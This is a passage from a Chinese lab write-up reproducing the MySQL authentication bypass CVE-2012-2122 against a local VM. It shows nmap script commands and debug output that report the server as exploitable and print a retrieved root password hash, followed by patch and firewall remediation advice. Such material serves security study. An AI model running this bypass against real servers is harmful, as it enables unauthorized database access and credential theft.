root@kali:~# nmap -sV -T4 -p3306 --script=mysql-vuln-cve2012-2122 192.168.118.130Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:07 CSTNmap scan report for bogon (192.168.118.130)Host is up (0.00033s latency).PORT STATE SERVICE VERSION3306/tcp open mysqlMySQL 5.5.23| mysql-vuln-cve2012-2122: |VULNERABLE:|Authentication bypass in MySQL servers.| State: VULNERABLE (Exploitable)| IDs: CVE:CVE-2012-2122|When a user connects to MariaDB/MySQL, a token (SHA|over a password and a random scramble string) is calculated and compared|with the expected value. Because of incorrect casting, it might've|happened that the token and the expected value were considered equal,|even if the memcmp() retued a non-zero value. In this case|MySQL/MariaDB would think that the password is correct, even while it is|not. Because the protocol uses random strings, the probability of|hitting this bug is about 1/256.|Which means, if one knows a user name to connect (and "root" almost|always exists), she can connect using *any* password by repeating|connection attempts. ~300 attempts takes only a fraction of second, so|basically account password protection is as good as nonexistent.|| Disclosure date: 2012-06-9| Extra information:|Server granted access at iteration #1500|| root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9|| References:|http://seclists.org/oss-sec/2012/q2/493|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122|_ https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysqlMAC Address: 00:0C:29:25:90:3B (VMware)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds
-d选项来查看debug信息,查看具体的信息如下:
root@kali:~# nmap -sV -T4 -p3306 -d --script=mysql-vuln-cve2012-2122 192.168.118.130Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-29 16:13 CST--------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0---------------------------------------------NSE: Using Lua 5.3.NSE: Arguments from CLI: NSE: Loaded 41 scripts for scanning.NSE: Script Pre-scanning.NSE: Starting runlevel 1 (of 2) scan.Initiating NSE at 16:13Completed NSE at 16:13, 0.00s elapsedNSE: Starting runlevel 2 (of 2) scan.Initiating NSE at 16:13Completed NSE at 16:13, 0.00s elapsedInitiating ARP Ping Scan at 16:13Scanning 192.168.118.130 [1 port]Packet capture filter (device eth0): arp and arp[18:4] = 0x000C29A8 and arp[22:2] = 0x84F5Completed ARP Ping Scan at 16:13, 0.03s elapsed (1 total hosts)Overall sending rates: 29.01 packets / s, 1218.42 bytes / s.mass_rdns: Using DNS server 192.168.118.2Initiating Parallel DNS resolution of 1 host. at 16:13mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]Completed Parallel DNS resolution of 1 host. at 16:13, 0.00s elapsedDNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]Initiating SYN Stealth Scan at 16:13Scanning bogon (192.168.118.130) [1 port]Packet capture filter (device eth0): dst host 192.168.118.128 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 192.168.118.130)))Discovered open port 3306/tcp on 192.168.118.130Completed SYN Stealth Scan at 16:13, 0.04s elapsed (1 total ports)Overall sending rates: 23.44 packets / s, 1031.36 bytes / s.Initiating Service scan at 16:13Scanning 1 service on bogon (192.168.118.130)Completed Service scan at 16:13, 0.00s elapsed (1 service on 1 host)NSE: Script scanning 192.168.118.130.NSE: Starting runlevel 1 (of 2) scan.Initiating NSE at 16:13NSE: Starting mysql-vuln-cve2012-2122 against 192.168.118.130:3306.NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #1NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #2NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #3NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #4NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #5NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #6NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #7NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #8NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #9NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #10NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #11NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #12NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #13NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #14NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #15NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #16NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #17NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #18NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #19NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #20NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #21NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #22NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #23NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #24NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #25NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #26NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #27NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #28NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #29NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #30NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #31NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #32NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #33NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #34NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #35NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #36NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #37NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #38NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #39NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #40NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #41NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #42NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #43NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #44NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #45NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #46NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #47NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #48NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #49NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #50NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #51NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #52NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #53NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #54NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #55NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #56NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #57NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #58NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #59NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #60NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #61NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #62NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #63NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #64NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #65NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #66NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #67NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #68NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #69NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #70NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #71NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #72NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #73NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #74NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #75NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #76NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #77NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #78NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #79NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #80NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #81NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #82NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #83NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #84NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #85NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #86NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #87NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #88NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #89NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #90NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #91NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #92NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #93NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #94NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #95NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #96NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #97NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #98NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #99NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #100NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #101NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #102NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #103NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #104NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #105NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #106NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #107NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #108NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #109NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #110NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #111NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #112NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #113NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #114NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #115NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #116NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #117NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #118NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #119NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #120NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #121NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #122NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #123NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #124NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #125NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #126NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #127NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #128NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #129NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #130NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #131NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #132NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #133NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #134NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #135NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #136NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #137NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #138NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #139NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #140NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #141NSE: [mysql-vuln-cve2012-2122 192.168.118.130:3306] Connection attempt #142NSE: Finished mysql-vuln-cve2012-2122 against 192.168.118.130:3306.Completed NSE at 16:13, 0.42s elapsedNSE: Starting runlevel 2 (of 2) scan.Initiating NSE at 16:13Completed NSE at 16:13, 0.00s elapsedNmap scan report for bogon (192.168.118.130)Host is up, received arp-response (0.00068s latency).Scanned at 2018-08-29 16:13:26 CST for 1sPORT STATE SERVICE REASON VERSION3306/tcp open mysqlsyn-ack ttl 63 MySQL 5.5.23| mysql-vuln-cve2012-2122: |VULNERABLE:|Authentication bypass in MySQL servers.| State: VULNERABLE (Exploitable)| IDs: CVE:CVE-2012-2122|When a user connects to MariaDB/MySQL, a token (SHA|over a password and a random scramble string) is calculated and compared|with the expected value. Because of incorrect casting, it might've|happened that the token and the expected value were considered equal,|even if the memcmp() retued a non-zero value. In this case|MySQL/MariaDB would think that the password is correct, even while it is|not. Because the protocol uses random strings, the probability of|hitting this bug is about 1/256.|Which means, if one knows a user name to connect (and "root" almost|always exists), she can connect using *any* password by repeating|connection attempts. ~300 attempts takes only a fraction of second, so|basically account password protection is as good as nonexistent.|| Disclosure date: 2012-06-9| Extra information:|Server granted access at iteration #1500|| root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9|| References:|http://seclists.org/oss-sec/2012/q2/493|https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122MAC Address: 00:0C:29:25:90:3B (VMware)Final times for host: srtt: 677 rttvar: 3967 to: 100000NSE: Script Post-scanning.NSE: Starting runlevel 1 (of 2) scan.Initiating NSE at 16:13Completed NSE at 16:13, 0.00s elapsedNSE: Starting runlevel 2 (of 2) scan.Initiating NSE at 16:13Completed NSE at 16:13, 0.00s elapsedRead from /usr/bin/../share/nmap: nmap-mac-prefixes nmap-payloads nmap-service-probes nmap-services.Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 0.96 secondsRaw packets sent: 2 (72B) | Rcvd: 2 (72B)root@kali:~#
四、漏洞修复建议
升级官方补丁:
MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23
MySQL 5.1.63, 5.5.24, 5.6.6
Sebug临时解决办法:
在防火墙上关闭mysql端口
参考:
http://www.freebuf.com/vuls/3815.html
http://blog.51cto.com/linuxgeek/998210
https://www.exploit-db.com/exploits/19092/
https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/
Next:
1、分析mysql源码 http://blog.51cto.com/linuxgeek/998210进一步的学习
2、分析nmap、metasploit脚本提高脚本编写能力
3、漏洞环境复现,目前在官方下载了对应有漏洞的mysql版本并安装在Windows下,但是并没有复现成功!
作者:竹小冉
来源链接:https://www.cnblogs.com/zhuxr/p/9553541.html
版权声明:
1、JavaClub(https://www.javaclub.cn)以学习交流为目的,由作者投稿、网友推荐和小编整理收藏优秀的IT技术及相关内容,包括但不限于文字、图片、音频、视频、软件、程序等,其均来自互联网,本站不享有版权,版权归原作者所有。
2、本站提供的内容仅用于个人学习、研究或欣赏,以及其他非商业性或非盈利性用途,但同时应遵守著作权法及其他相关法律的规定,不得侵犯相关权利人及本网站的合法权利。
3、本网站内容原作者如不愿意在本网站刊登内容,请及时通知本站(javaclubcn@163.com),我们将第一时间核实后及时予以删除。
